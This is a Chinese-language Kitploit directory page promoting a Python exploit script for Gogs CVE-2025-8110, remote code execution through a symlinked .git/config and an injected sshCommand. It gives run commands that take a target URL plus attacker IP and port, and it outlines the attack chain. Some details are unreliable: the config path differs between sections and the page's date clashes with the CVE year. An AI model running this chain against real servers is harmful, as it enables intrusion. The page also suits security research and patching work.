Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
cve-2025-8110-GOGS-RCE — GOGS RCE cve-2025-8110 的 Python 脚本,该脚本自动化了完整的攻击链:创建一个仓库,其中包含指向 .git/config 的符号链接文件,然后通过在配置文件上植入恶意的 sshCommand 来触发远程代码执行。 | Kitploit
工具/GitHubGitHub/kayl22/cve-2025-8110-gogs-rce
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制红队Payload 开发
GitHubkayl22/cve-2025-8110-gogs-rce

cve-2025-8110-GOGS-RCE

GOGS RCE cve-2025-8110 的 Python 脚本,该脚本自动化了完整的攻击链:创建一个仓库,其中包含指向 .git/config 的符号链接文件,然后通过在配置文件上植入恶意的 sshCommand 来触发远程代码执行。

查看仓库
45个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

GOGS RCE cve-2025-8110

Gogs 是一个轻量级、自托管的 Git 服务,类似于 GitHub 的私有版本,旨在轻松运行于低资源服务器上。CVE-2025-8110 漏洞是一个严重的安全缺陷,攻击者可以通过使用符号链接绕过路径限制。通过上传一个指向 .api/config 的恶意链接,攻击者可以利用 Gogs API 嵌入一个包含 sshCommand 参数的恶意配置文件,从而在主机服务器上实现远程代码执行 (RCE)。



用法

  1. 将此仓库克隆到本地:
root@kitploit:~
git clone https://github.com/kayl22/cve-2025-8110-GOGS-RCE
cd ./cve-2025-8110-GOGS-RCE

  1. 安装所有依赖
root@kitploit:~
pip3 install -r ./requirements.txt

  1. 运行脚本
root@kitploit:~
# 打印帮助信息
python3 ./cve-2025-8110.py --help

# 执行攻击链(包含注册步骤)
python3 ./cve-2025-8110.py --url http://<host> -lh <attacker-ip> -lp <attacker-port>

# 执行攻击链(跳过注册),当注册函数返回错误语句时有用
python3 ./cve-2025-8110.py --url http://<host> -lh <attacker-ip> -lp <attacker-port> -U <username> -P <password>


工作原理

此脚本遵循以下攻击链步骤:

root@kitploit:~
1. 注册并认证一个一次性账户(如果通过 -U 和 -P 参数提供了凭据,则跳过注册)
2. 获取 API 承载令牌
3. 创建一个自动初始化的仓库
4. 在本地克隆仓库,并推送一个相对符号链接:malicious_link -> .git/config
5. 通过 PutContents API 经由符号链接写入恶意 git 配置(包含 sshCommand)
6. 通过 SSH 克隆仓库以触发 sshCommand

致谢

本脚本基于 zAbuQasem(https://github.com/zAbuQasem)的 PoC 制作。

下载工具